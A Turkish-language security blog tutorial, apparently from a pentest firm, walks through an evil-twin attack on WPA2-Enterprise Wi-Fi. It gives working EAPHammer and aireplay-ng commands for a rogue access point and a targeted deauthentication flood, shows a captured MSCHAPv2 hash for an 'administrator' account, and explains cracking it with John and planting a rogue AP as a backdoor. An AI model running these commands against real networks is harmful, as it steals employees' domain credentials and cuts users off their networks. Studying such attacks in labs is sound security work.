Wpa2’nin de kırıldığını duyduk ama bu beklediğimiz gibi bir durum olmadı. Herkes bekliyordu ki; modemin parolası elde edilecek fakat öyle olmadı. Ortamda yakalan paketlerin sadece şifresiz protolkeri(http,ftp,…) izlemeye izin verdiği gözlenmiş. Şifreli bir protokol kullanıldığında ise paketlerin anlamı olmayacaktır. Bir de şöyle bir durum var; cihazlara güncelleme yapıldığında bu şifresiz protokollerinde izlenmesinin önüne geçildiğini duyduk. Krack için yayınlanan tool’unda şu anda sadece doğruluk testi yaptığı görebilirsiniz. Yani yakalanan paketleri size göstermeyecektir.
Kurumsal ortamlarda access point’lere bağlanıldığında kullanıcı adı ve parola sorar, sorgulama sonucu active domain sorgulama sonucu doğru ise radius bu doğrulamayı kabul ederek internet erişiminize izin verecektir.
Biz sahte bir access point kuracağız ve kullanıcıyı bulunduğu ağdan düşürdükten sonra sahte access point’e bağlayacağız. Bunun için kali’yi kullanabiliriz.
Radius server ve sahte access point kurulumu için hostapd uygulaması içeren Eaphammer uygulamasını indirelim.
git clone https://github.com/s0lst1c3/eaphammer.git cd eaphammerindirdekten sonra kurulum için
./kali-setupŞimdi sertifika üretelim
./eaphammer --cert-wizardŞimdi ortamı dinlemeye hazırlık yapalım.
Wlan0 başlatalım.
Ortamı dinlemeye başlayalım.
airodump-ng wlan0mon
Şimdi access point bssid ve essid bilgileri elde ettikten sonra sahte access point oluşturmak için ilerleyelim.
- interface: hangi interfaceden yaptığınıza dikkat edin
- bssid: Access point’in MAC adresi
- essid: Yayın yaptığı isim bilgisi
- channel: hangi kanalda yayın yapıyorsa (1-13)
- auth: authentication türü (peap,ttls,open)
- wpa: şifrele türü (1,2)
./eaphammer --interface wlan0mon --bssid BC:F5:AC:FB:DA:76 --essid "Btrisk Test" --channel 1 --auth open --wpa 2
Personel bilgilerini girdikten sonra özetler aşağıdaki gibi olacaktır.
mschapv2: Fri Dec 15 08:24:56 2017 username: administrator challenge: 05:86:cd:d2:2c:a2:dd:97 response: 93:eb:79:03:89:0b:cc:f6:a3:3d:92:47:9c:ad:34:50:bc:cc:20:29:50:88:65:50 jtr NETNTLM: administrator:$NETNTLM$0586cdd22ca2dd97$93eb7903890bccf6a33d92479cad3450bccc202950886550
Bu bilgileri bir dosyaya yazalım.
John tool’unu kullanarak bu hash değerini bulabiliriz.
Eğer ağa bağlı birisi varsa onu bağlı olduğu access point’den düşürebiliriz ve bizim sahte ağa otomatik dahil olabilir. Burada uzaklık farkı önemli bir etken olacaktır. İşletim sistemleri hangi access point yakınsa ilk onunla iletişime geçmeye çalışacaktır. Android İşletim sisteminde otomatik bağlanmaktadır. Fakat Windows 10 bu mümkün olmadı. Diğer windows sürümlerinde de farklı olabilir.
Şimd bağlı olan bir client’i düşürerek sahte olan access point bağlamaya çalışalım.
Access point’in ve Client’in Mac adreslerini öğrenelim.
Belirlenen Client'i access point'den düşürmek için;
aireplay-ng -0 1000 -a BC:F5:AC:FB:DA:76 -c F0:D5:BF:AC:7F:5B wlan0mon
Client düştükten sonra cihazlar otomatik bağlanmaya çalıştığında sahte olan access point’e bağlanabilir. Şifresiz olan trafikler aşağıdaki gibi izlenebilecektir.
Bunların dışında farklı bir saldırı yöntemi de, network'e bağlanan saldırı access point ile farklı bir SSID tanımlanarak ağ dışarı açılabilir. Saldırgan access point'i kurduğundan dolayı erişim bilgileri sadece kendisinde olacaktır. Böylece saldırgan için yeni bir access point oluşturulmuş ve kimsenin bilmediği bir erişim ile ağa dahil olmuş olabilir.
